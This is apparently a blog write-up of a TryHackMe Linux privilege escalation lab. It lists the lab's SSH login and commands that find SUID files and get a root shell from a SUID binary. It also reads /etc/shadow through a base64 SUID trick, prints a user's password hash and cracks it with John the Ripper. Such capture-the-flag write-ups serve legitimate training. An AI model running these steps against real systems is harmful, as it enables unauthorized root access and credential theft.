TryHackMe: Write-Up Linux PrivEsc

> find / -writable 2>/dev/null > /tmp/result
$ ls -al /home/murdochtotal 32drwxrwxrwx 2 root root  4096 Oct 22 07:19 .drwxr-xr-x 5 root root  4096 Jun 20  2021 ..-rwsr-xr-x 1 root root 16712 Jun 20  2021 test-rw-rw-r-- 1 root root    86 Jun 20  2021 thm.py
$ ./testroot@ip-10-10-xx-xx:/home/murdoch#
root@ip-10-10-xx-xx:/root# find / -name "flag6.txt" 2>/dev/null/home/matt/flag6.txt
By now you have a fairly good understanding of the main privilege escalation vectors on Linux and this challenge should be fairly easy.You have gained SSH access to a large scientific facility. Try to elevate your privileges until you are Root.
We designed this room to help you build a thorough methodology for Linux privilege escalation that will be very useful in exams such as OSCP and your penetration testing engagements.
Leave no privilege escalation vector unexplored, privilege escalation is often more an art than a science.You can access the target machine over your browser or use the SSH credentials below.Username: leonard
Password: Penny123
> find / -type f -perm -04000 -ls 2>/dev/null
15  cd rootflag/16  ls17  cat flag2.txt
> LF='/home/rootflag/flag2.txt'
> base64 $LF | base64 --decode
> LF='/etc/shadow'
> base64 $LF | base64 --decode
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
> echo $6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/ > missy-hash-file
> john --wordlist=/usr/share/wordlists/rockyou.txt -format=sha512crypt missy-hash-file
> su - missy
> find / -name "flag1.txt" 2>/dev/null
/home/missy/Documents/flag1.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
One9twO

One9twO

A pragmatic programmer with a rubber duck.